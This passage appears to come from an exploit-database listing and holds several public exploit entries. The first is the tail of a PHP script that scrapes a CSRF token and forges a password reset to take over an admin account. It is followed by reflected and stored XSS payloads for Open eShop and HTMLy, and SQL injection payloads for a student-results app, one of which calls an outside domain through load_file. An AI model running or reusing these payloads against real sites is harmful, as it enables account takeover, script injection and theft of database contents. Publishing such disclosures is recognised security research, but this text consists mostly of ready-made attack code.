4: taking over the admin account by resetting their password\n";<br /><br />@unlink('./cookies.txt');<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");<br />curl_setopt($ch, CURLOPT_POST, false);<br />curl_setopt($ch, CURLOPT_HEADER, true);<br />curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');<br />curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');<br /><br />if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");<br /><br />$passwd = md5(time());<br />$params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";<br /><br />curl_setopt($ch, CURLOPT_POSTFIELDS, $params);<br /><br />if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n");<br /><br />print "[+] Done! You can log into the AdminCP with {$email}:{$passwd}\n";<br /><br /></code></pre>
<pre><code># Exploit Title: Open eShop Version : 2.7.0 - Reflected XSS<br /># Exploit Author: tmrswrr <br /># Vendor Homepage: http://www.open-eshop.com/<br /># Version : 2.7.0<br /># Date : 04/08/2024<br /><br />1 ) Go to home page https://127.0.0.1/Open_eShop<br />2 ) Write url this payload : test.html"><img src=x onerrora=confirm() onerror=confirm(1)><br /><br />3 ) After save it you will be see xss alert<br /><br />https://127.0.0.1/Open_eShop/test.html"><img src=x onerrora=confirm() onerror=confirm(1)><br /><br /></code></pre>
<pre><code># Exploit Title: HTMLy Version : 2.9.6 - Stored XSS<br /># Exploit Author: tmrswrr <br /># Vendor Homepage: https://www.htmly.com/<br /># Version 3.10.8.21 <br /># Date : 04/08/2024<br /><br />1 ) Login admin https://127.0.0.1/HTMLy/admin/config<br />2 ) General Setting > Blog title > "><img src=x onerrora=confirm() onerror=confirm(1)> <br />3 ) After save it you will be see xss alert<br /><br /></code></pre>
<pre><code>## Title: upresult_0.1-2024 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 04/08/2024<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The nid parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'<br />was submitted in the nid parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed.<br />The attacker can get all information from the system by using this<br />vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: nid (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM<br />(SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT<br />NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/upresult_0.1-2024)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/04/upresult01-2024-multiple-sqli.html)<br /><br />## Time spent:<br />00:15:00<br /><br /><br /></code></pre>